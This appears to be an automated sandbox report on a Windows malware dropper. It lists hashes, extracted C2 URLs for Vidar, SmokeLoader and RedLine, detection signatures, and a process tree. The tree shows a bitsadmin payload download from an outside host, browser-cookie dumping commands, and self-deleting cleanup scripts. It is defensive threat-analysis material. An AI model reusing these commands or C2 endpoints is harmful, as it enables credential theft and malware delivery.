Analysis

  • max time kernel
    90s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    30-07-2021 03:02

General

  • Target

    a9049d13128ecd6f1f151527984028a7.exe

  • Size

    3.2MB

  • MD5

    a9049d13128ecd6f1f151527984028a7

  • SHA1

    d4f4c653cb783792f1cf9a97cfadc1143e556edb

  • SHA256

    2dd292dcc5d8e599d717242cb403360120308bed82e47709f6ae231202e1b0ff

  • SHA512

    410a3e91d0d0b7d177bfd15bb3dad07d48ddbe7e125ab02e83d62abdc27e6adb0bc718180e95ccf01faf8f647b3a8b4e92059bad457b35f73e55f1fdade9b46b

Malware Config

Extracted

Family

vidar

Version

39.7

Botnet

706

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

29_7_6lk

C2

zertypelil.xyz:80

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Observed Elysium Stealer Variant CnC Domain (all-brain-company .xyz in TLS SNI)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 4 IoCs
  • Vidar Stealer 7 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 49 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a9049d13128ecd6f1f151527984028a7.exe
    "C:\Users\Admin\AppData\Local\Temp\a9049d13128ecd6f1f151527984028a7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zSC8270754\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3712
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_1.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1600
        • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_1.exe
          sahiba_1.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2844
          • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_1.exe
            "C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_1.exe" -a
            5⤵
            • Executes dropped EXE
            PID:3928
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_2.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3084
        • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_2.exe
          sahiba_2.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          PID:3936
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sahiba_3.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3292
        • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_3.exe
          sahiba_3.exe
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:3560
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c taskkill /im sahiba_3.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_3.exe" & del C:\ProgramData\*.dll & exit
            5⤵
              PID:5428
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /im sahiba_3.exe /f
                6⤵
                • Kills process with taskkill
                PID:5696
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 6
                6⤵
                • Delays execution with timeout.exe
                PID:6056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_4.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:8
          • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_4.exe
            sahiba_4.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3948
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sahiba_6.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2068
          • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_6.exe
            sahiba_6.exe
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious behavior: EnumeratesProcesses
            PID:692
            • C:\Users\Admin\Documents\cZxBsPJ3MYMCKoMNfTVxWyM5.exe
              "C:\Users\Admin\Documents\cZxBsPJ3MYMCKoMNfTVxWyM5.exe"
              5⤵
              • Executes dropped EXE
              PID:4212
            • C:\Users\Admin\Documents\0OAXsIK48gKGiEYyBpbrCNhf.exe
              "C:\Users\Admin\Documents\0OAXsIK48gKGiEYyBpbrCNhf.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4328
            • C:\Users\Admin\Documents\hxH1tqIVJj1MLCllvJxxdHyA.exe
              "C:\Users\Admin\Documents\hxH1tqIVJj1MLCllvJxxdHyA.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:4056
              • C:\Users\Admin\Documents\hxH1tqIVJj1MLCllvJxxdHyA.exe
                C:\Users\Admin\Documents\hxH1tqIVJj1MLCllvJxxdHyA.exe
                6⤵
                • Executes dropped EXE
                PID:4484
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 1476
                  7⤵
                  • Executes dropped EXE
                  • Program crash
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4168
            • C:\Users\Admin\Documents\JPSO9289MlUhbQrEiIoPuUVy.exe
              "C:\Users\Admin\Documents\JPSO9289MlUhbQrEiIoPuUVy.exe"
              5⤵
              • Executes dropped EXE
              PID:4380
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                6⤵
                  PID:184
                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                  6⤵
                    PID:4900
                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    6⤵
                      PID:5024
                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                      6⤵
                        PID:3956
                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        6⤵
                          PID:6284
                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                          6⤵
                            PID:6332
                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            6⤵
                              PID:6996
                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                              6⤵
                                PID:7040
                            • C:\Users\Admin\Documents\RbdvGEt18gUHqvuJDhipmwFS.exe
                              "C:\Users\Admin\Documents\RbdvGEt18gUHqvuJDhipmwFS.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:2468
                            • C:\Users\Admin\Documents\3CXLQNARFK_pfxsgvlZajouI.exe
                              "C:\Users\Admin\Documents\3CXLQNARFK_pfxsgvlZajouI.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:4332
                              • C:\Users\Admin\Documents\3CXLQNARFK_pfxsgvlZajouI.exe
                                "C:\Users\Admin\Documents\3CXLQNARFK_pfxsgvlZajouI.exe" -a
                                6⤵
                                  PID:6028
                              • C:\Users\Admin\Documents\Oi8hIXFxB_BAshqIvb8QR6wf.exe
                                "C:\Users\Admin\Documents\Oi8hIXFxB_BAshqIvb8QR6wf.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:4740
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                  6⤵
                                    PID:4948
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4740 -s 248
                                    6⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1404
                                • C:\Users\Admin\Documents\QcZRpkyVY53Zs594AsQCHivp.exe
                                  "C:\Users\Admin\Documents\QcZRpkyVY53Zs594AsQCHivp.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:4808
                                  • C:\Users\Admin\Documents\QcZRpkyVY53Zs594AsQCHivp.exe
                                    "C:\Users\Admin\Documents\QcZRpkyVY53Zs594AsQCHivp.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    PID:4384
                                • C:\Users\Admin\Documents\usVvcPFhFPyBPdrTeyhrniNd.exe
                                  "C:\Users\Admin\Documents\usVvcPFhFPyBPdrTeyhrniNd.exe"
                                  5⤵
                                    PID:4168
                                    • C:\Users\Admin\AppData\Roaming\8527379.exe
                                      "C:\Users\Admin\AppData\Roaming\8527379.exe"
                                      6⤵
                                        PID:5616
                                      • C:\Users\Admin\AppData\Roaming\1225020.exe
                                        "C:\Users\Admin\AppData\Roaming\1225020.exe"
                                        6⤵
                                          PID:5540
                                        • C:\Users\Admin\AppData\Roaming\8946089.exe
                                          "C:\Users\Admin\AppData\Roaming\8946089.exe"
                                          6⤵
                                            PID:5656
                                        • C:\Users\Admin\Documents\5VvPV_OAfbuB6be6YVhZok1L.exe
                                          "C:\Users\Admin\Documents\5VvPV_OAfbuB6be6YVhZok1L.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          PID:4268
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 5VvPV_OAfbuB6be6YVhZok1L.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5VvPV_OAfbuB6be6YVhZok1L.exe" & del C:\ProgramData\*.dll & exit
                                            6⤵
                                              PID:6056
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /im 5VvPV_OAfbuB6be6YVhZok1L.exe /f
                                                7⤵
                                                • Kills process with taskkill
                                                PID:5772
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 6
                                                7⤵
                                                • Delays execution with timeout.exe
                                                PID:5136
                                          • C:\Users\Admin\Documents\tTXWohd89OlwPBfSzInAIlvh.exe
                                            "C:\Users\Admin\Documents\tTXWohd89OlwPBfSzInAIlvh.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2864
                                            • C:\Users\Admin\Documents\tTXWohd89OlwPBfSzInAIlvh.exe
                                              C:\Users\Admin\Documents\tTXWohd89OlwPBfSzInAIlvh.exe
                                              6⤵
                                                PID:4772
                                            • C:\Users\Admin\Documents\aGd98t6jznQRFFzWSqrfRIZT.exe
                                              "C:\Users\Admin\Documents\aGd98t6jznQRFFzWSqrfRIZT.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3084
                                              • C:\Users\Admin\Documents\aGd98t6jznQRFFzWSqrfRIZT.exe
                                                C:\Users\Admin\Documents\aGd98t6jznQRFFzWSqrfRIZT.exe
                                                6⤵
                                                  PID:3244
                                              • C:\Users\Admin\Documents\wiZh42u1uJ5C8rXokVudXpaf.exe
                                                "C:\Users\Admin\Documents\wiZh42u1uJ5C8rXokVudXpaf.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:672
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:1092
                                                • C:\Users\Admin\Documents\wiZh42u1uJ5C8rXokVudXpaf.exe
                                                  C:\Users\Admin\Documents\wiZh42u1uJ5C8rXokVudXpaf.exe
                                                  6⤵
                                                    PID:4404
                                                • C:\Users\Admin\Documents\tN1bRI7Fm49k64G0Ux4elgP8.exe
                                                  "C:\Users\Admin\Documents\tN1bRI7Fm49k64G0Ux4elgP8.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4928
                                                • C:\Users\Admin\Documents\e6l0dx4mlk2VQXIdu7sd1JUS.exe
                                                  "C:\Users\Admin\Documents\e6l0dx4mlk2VQXIdu7sd1JUS.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4440
                                                • C:\Users\Admin\Documents\0iQ2BJp0Ei7vRTp4eXbuweGi.exe
                                                  "C:\Users\Admin\Documents\0iQ2BJp0Ei7vRTp4eXbuweGi.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:4428
                                                  • C:\Users\Admin\Documents\0iQ2BJp0Ei7vRTp4eXbuweGi.exe
                                                    "C:\Users\Admin\Documents\0iQ2BJp0Ei7vRTp4eXbuweGi.exe"
                                                    6⤵
                                                      PID:7264
                                                  • C:\Users\Admin\Documents\DDVx250wdOxNwsWBBCc8y1F8.exe
                                                    "C:\Users\Admin\Documents\DDVx250wdOxNwsWBBCc8y1F8.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:4884
                                                  • C:\Users\Admin\Documents\kQkWWymTJS7KFp0wiWwVZQb4.exe
                                                    "C:\Users\Admin\Documents\kQkWWymTJS7KFp0wiWwVZQb4.exe"
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:4676
                                                    • C:\Users\Admin\Documents\kQkWWymTJS7KFp0wiWwVZQb4.exe
                                                      C:\Users\Admin\Documents\kQkWWymTJS7KFp0wiWwVZQb4.exe
                                                      6⤵
                                                        PID:5088
                                                      • C:\Users\Admin\Documents\kQkWWymTJS7KFp0wiWwVZQb4.exe
                                                        C:\Users\Admin\Documents\kQkWWymTJS7KFp0wiWwVZQb4.exe
                                                        6⤵
                                                          PID:5232
                                                      • C:\Users\Admin\Documents\c9O8KSifgyuzRkUrGQq2YUo4.exe
                                                        "C:\Users\Admin\Documents\c9O8KSifgyuzRkUrGQq2YUo4.exe"
                                                        5⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: MapViewOfSection
                                                        PID:3936
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 656
                                                          6⤵
                                                          • Program crash
                                                          PID:5304
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 672
                                                          6⤵
                                                          • Program crash
                                                          PID:5356
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 776
                                                          6⤵
                                                          • Program crash
                                                          PID:5624
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 812
                                                          6⤵
                                                          • Program crash
                                                          PID:5888
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 1120
                                                          6⤵
                                                          • Program crash
                                                          PID:776
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 1128
                                                          6⤵
                                                          • Program crash
                                                          PID:5440
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 1152
                                                          6⤵
                                                          • Program crash
                                                          PID:5220
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3936 -s 1164
                                                          6⤵
                                                          • Program crash
                                                          PID:3356
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "c9O8KSifgyuzRkUrGQq2YUo4.exe" /f & erase "C:\Users\Admin\Documents\c9O8KSifgyuzRkUrGQq2YUo4.exe" & exit
                                                          6⤵
                                                            PID:5932
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /im "c9O8KSifgyuzRkUrGQq2YUo4.exe" /f
                                                              7⤵
                                                              • Kills process with taskkill
                                                              PID:3880
                                                        • C:\Users\Admin\Documents\F6bvoERSuW3DupmN8QNBBIMq.exe
                                                          "C:\Users\Admin\Documents\F6bvoERSuW3DupmN8QNBBIMq.exe"
                                                          5⤵
                                                          • Executes dropped EXE
                                                          PID:4324
                                                        • C:\Users\Admin\Documents\XmeEidxqFjYjPzDLKKLzAbFD.exe
                                                          "C:\Users\Admin\Documents\XmeEidxqFjYjPzDLKKLzAbFD.exe"
                                                          5⤵
                                                            PID:5640
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrC90F.tmp\tempfile.ps1"
                                                              6⤵
                                                                PID:1296
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrC90F.tmp\tempfile.ps1"
                                                                6⤵
                                                                  PID:6932
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrC90F.tmp\tempfile.ps1"
                                                                  6⤵
                                                                    PID:6024
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrC90F.tmp\tempfile.ps1"
                                                                    6⤵
                                                                      PID:5488
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrC90F.tmp\tempfile.ps1"
                                                                      6⤵
                                                                        PID:7600
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrC90F.tmp\tempfile.ps1"
                                                                        6⤵
                                                                          PID:8128
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrC90F.tmp\tempfile.ps1"
                                                                          6⤵
                                                                            PID:7648
                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                            "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                            6⤵
                                                                            • Download via BitsAdmin
                                                                            PID:6744
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c sahiba_7.exe
                                                                      3⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:816
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_7.exe
                                                                        sahiba_7.exe
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:3868
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Compatto.rtf
                                                                          5⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:2160
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd
                                                                            6⤵
                                                                            • Suspicious use of WriteProcessMemory
                                                                            PID:3968
                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                              findstr /V /R "^jvMDwkwydQdmnxGPmMOjYlbIlopECWXOZojRKCmISYgoKPYfXOyLKoMeYraSevCxTCAdoOyWjyxqVfYxlTHNQkrRvpTHpGGccUgofIipJpnFNMuJyYIpPPDHnITYVnMGn$" Oggi.rtf
                                                                              7⤵
                                                                                PID:4084
                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                                                                Triste.exe.com n
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                PID:4184
                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com n
                                                                                  8⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4436
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping 127.0.0.1 -n 30
                                                                                7⤵
                                                                                • Runs ping.exe
                                                                                PID:4456
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sahiba_8.exe
                                                                        3⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:2260
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_8.exe
                                                                          sahiba_8.exe
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:3788
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:5100
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:4224
                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            5⤵
                                                                              PID:1092
                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:4700
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:4208
                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                              5⤵
                                                                                PID:3316
                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                5⤵
                                                                                  PID:412
                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                  5⤵
                                                                                    PID:492
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sahiba_5.exe
                                                                                3⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2124
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_5.exe
                                                                                  sahiba_5.exe
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3952
                                                                                  • C:\Users\Admin\AppData\Roaming\7077425.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\7077425.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
